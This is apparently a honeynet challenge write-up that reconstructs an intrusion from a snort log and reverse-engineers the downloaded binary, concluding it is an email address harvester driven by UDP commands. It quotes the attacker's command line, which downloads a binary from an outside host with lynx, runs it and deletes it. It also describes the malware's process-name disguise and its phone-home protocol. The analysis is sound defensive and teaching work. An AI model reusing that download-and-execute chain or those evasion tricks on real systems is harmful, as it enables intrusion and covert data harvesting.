This page provides a description of the general methodologies I used to determine exactly what happened in the attack presented in the snort log file.
I used a number of different methods in the process, including log analysis and reverse engineering techniques such as disassembly and debugging.
Used to run foo (after first disconnecting it from the rest of the network!)
Used to communicate with foo, and analyse network traffic.
To look at the behaviour on IP protocol 11, I initially attempted to get decoder.c, provided on the challenge page, to work. However, decoder.c requires libpcap to be installed, and I had trouble installing it under Cygwin. Instead, I used the decoder Perl script written by Dion Mendel for the Reverse Challenge project (the script expects to find an executable called tcpdump - this can be achieved under Cygwin by creating a symbolic link to windump).
$ bin/decoder snort-0718\@1401.log > decode.log
Of all the commands executed, the fourth from last is the most interesting. Breaking the command line down into its separate fragments, we get:
killall -9 ttserve: Kills any existing ttserve processes.
lynx -source http://216.242.103.2:8882/foo > /tmp/ttserve: Downloads foo from 216.242.103.2, storing it as /tmp/ttserve.
chmod 755 /tmp/ttserve: Makes /tmp/ttserve executable.
cd /tmp: Changes to the /tmp directory.
./ttserve: Runs the ttserve (or foo) executable.
rm -rf /tmp/ttserve ./ttserve: Removes ttserve (twice, for good effect?).
To understand what the attacker is trying to achieve, it is therefore necessary to understand what foo/ttserve (henceforth referred to as foo) does.
To obtain foo, I used Ethereal's Follow TCP Stream tool on packet 73, which provided the entire HTTP communication between the honeypot machine and the webserver.
The request headers are provided here.
GET /foo HTTP/1.0
Host: 216.242.103.2:8882
Accept: text/html, text/plain, audio/mod, image/*, video/*, video/mpeg, application/pgp, application/pgp, application/pdf, message/partial, message/external-body, application/postscript, x-be2, application/andrew-inset, text/richtext, text/enriched
Accept: x-sun-attachment, audio-file, postscript-file, default, mail-file, sun-deskset-message, application/x-metamail-patch, text/sgml, */*;q=0.01
Accept-Encoding: gzip, compress
Accept-Language: en
User-Agent: Lynx/2.8.3dev.18 libwww-FM/2.14
I then saved the result, opened it in a text editor, snipped the request and response headers, and stored what remained as foo for analysis.
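The manual snipping step could also be scripted. The following is only a minimal sketch, assuming the saved stream holds the request followed by the response and that each header block ends with a CRLF blank line. The function name extract_body, the sample response headers and the placeholder payload are illustrative and are not taken from the capture.

```python
def extract_body(stream: bytes) -> bytes:
    """Return the bytes that follow the request and response header blocks."""
    # Split at most twice on the blank line that ends an HTTP header block:
    # part 0 = request headers, part 1 = response headers, part 2 = payload.
    # Limiting the split to 2 keeps any later CRLF pairs inside the payload.
    parts = stream.split(b"\r\n\r\n", 2)
    if len(parts) != 3:
        raise ValueError("expected a request and a response header block")
    return parts[2]


# Synthetic stream for illustration only (response headers are made up).
sample = (
    b"GET /foo HTTP/1.0\r\nHost: 216.242.103.2:8882\r\n\r\n"
    b"HTTP/1.0 200 OK\r\nContent-Type: text/plain\r\n\r\n"
    b"PAYLOAD\r\n\r\nMORE"
)
body = extract_body(sample)
```

Reading and writing in binary mode matters here, since a text editor or text-mode I/O may alter bytes in an executable.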
Essentially, I followed the procedure described by Dion Mendel, the winner of the Reverse Challenge. I describe the technicalities of the reverse engineering separately. The results of the reverse engineering can be seen in an attempt to recreate the C code.
The first thing that foo does is to set its name to '(nfsiod)', to disguise itself in process listings. The sequence of function calls
fork(); setsid(); setuid(); seteuid(); fork(); chdir("/");
is a clear indication that it then becomes a daemon.
Going back to the packet log, in packet 529, a UDP communication is made from the honeypot server to "11.11.11.11" (spoofed, naturally - the actual address is 216.242.103.2) on port 53413 with data "GU\n". This is presumably foo "phoning home", saying "I'm ready", as it is immediately followed by the response "DU9207100". These are the only non-DNS UDP commands used in the captured session.
In the part of the code referring to DU (lines 080485ce onward), it is clear that on receiving a DU, an iosscanf("%lu", &var) is performed - this obviously reads in the remainder of the command (the 9207100 part).
This command results in the next pattern of activity in the packet logs, which is a sequence of requests to web.icq.com, essentially getting the profile pages of all users with user ids in the range 9207100 - 9207199.
From these two pieces of evidence, the instruction DU9207100 is apparently a command to get the pages of 100 userids, starting from 9207100.
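As a rough illustration of this interpretation (not a reconstruction of foo's actual code), the sketch below parses a DU payload and yields the block of user ids it would cover. The name parse_du and the constant BLOCK_SIZE are hypothetical; the block size of 100 is inferred only from the 9207100 - 9207199 requests seen in the log.

```python
BLOCK_SIZE = 100  # assumption: inferred from the 9207100 - 9207199 requests


def parse_du(payload: bytes) -> range:
    """Interpret a 'DU<number>' payload as a block of consecutive user ids."""
    text = payload.decode("ascii").strip()
    if not text.startswith("DU"):
        raise ValueError("not a DU command")
    # Mirrors the "%lu" read of the remainder of the command.
    start = int(text[2:])
    return range(start, start + BLOCK_SIZE)


ids = parse_du(b"DU9207100")
first, last = ids[0], ids[-1]
```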
While it is difficult to determine from the raw code what the attacker is trying to achieve, I had two thoughts - a distributed denial of service, or email address harvesting. While investigating further, I recalled I'd seen a large block of code, with lots of compares to small constants (starting around 080487d4). Not wishing to go through every compare by hand, I wrote some C to substitute constants in the range 0x20-0x7f with their ASCII equivalents. The results are below:
$ bin/chartest dump4 > chartest.res
The lines from 0804885c to 080488d4 (cmpb with m, a, i, l, t, o, : in sequence) strongly suggest to me that this is an email address harvester.
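The constant substitution described above was done in C; the idea can be sketched in a few lines of Python. This is an assumption-laden illustration, not the chartest program itself: it assumes the disassembly uses AT&T-style immediates such as $0x6d, the sample lines are invented rather than copied from the dump, and the upper bound is 0x7e rather than 0x7f because 0x7f (DEL) has no printable form.

```python
import re

# Matches a one-byte immediate operand such as $0x6d (AT&T syntax assumed).
IMMEDIATE = re.compile(r"\$0x([0-9a-fA-F]{1,2})\b")


def annotate(line: str) -> str:
    """Replace printable one-byte immediates with their ASCII character."""
    def swap(match: re.Match) -> str:
        value = int(match.group(1), 16)
        if 0x20 <= value <= 0x7E:
            return "$'" + chr(value) + "'"
        return match.group(0)  # leave non-printable constants untouched

    return IMMEDIATE.sub(swap, line)


# Invented sample lines, for illustration only.
sample = ["cmpb   $0x6d,(%eax)", "cmpb   $0x3a,(%eax)", "cmpb   $0x1,(%eax)"]
annotated = [annotate(line) for line in sample]
```

Longer constants such as addresses are not matched, so only byte-sized compares are rewritten.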
Once I had exhausted my hand decompilation abilities, I moved on to active reverse engineering by running foo. As by now I understood what all the system calls did, I was reasonably happy to run foo, with two precautions. I used hexedit to change the UDP connection address to one of my local machines (a Sun Sparcstation LX), and I disconnected my hub from the external network. This allowed me to sniff the local network without any accidental external leaks.
I tracked the behaviour of foo by using strace, a program that's standard on Linux boxes (and probably some others too). This allowed me to check for things I'd missed in the decompilation - one of which was the port allocation in the sendto call in open_udp.
At the other end, I created a connection handler to receive UDP calls, and respond back with user-defined responses.
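A handler of this kind can be very small. The sketch below is not the handler I used; it is a minimal Python illustration with hypothetical function names, shown on the loopback interface with an ephemeral port. A real test against foo would bind to the port foo sends to (53413 in the packet log) on the machine whose address was patched into the binary.

```python
import socket


def make_server(host: str = "127.0.0.1", port: int = 0) -> socket.socket:
    """Create a UDP socket bound to host:port (port 0 = any free port)."""
    server = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    server.bind((host, port))
    server.settimeout(5.0)  # avoid blocking forever if nothing arrives
    return server


def answer_once(server: socket.socket, reply: bytes) -> bytes:
    """Wait for one datagram, send `reply` to its sender, return what arrived."""
    data, sender = server.recvfrom(2048)
    server.sendto(reply, sender)
    return data


# Loopback demonstration: a stand-in client plays the part of foo.
server = make_server()
client = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
client.settimeout(5.0)
client.sendto(b"GU\n", server.getsockname())
received = answer_once(server, b"DU9207100")
response, _ = client.recvfrom(2048)
client.close()
server.close()
```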
I was then able to use strace of foo at one end, and snoop the network while running the handler at the other end.
Unfortunately, I was able to do little with the handler program other than confirm that on receipt of a DU request, successive attempts to contact web.icq.com (which was unreachable, as I'd disconnected the network) were made.
Without the Reverse Challenge, it would have been significantly harder for me to have even started reverse engineering foo. In particular, the analysis of the-binary by Dion Mendel formed the basis of the reverse engineering here, and the tools he provided were a valuable asset.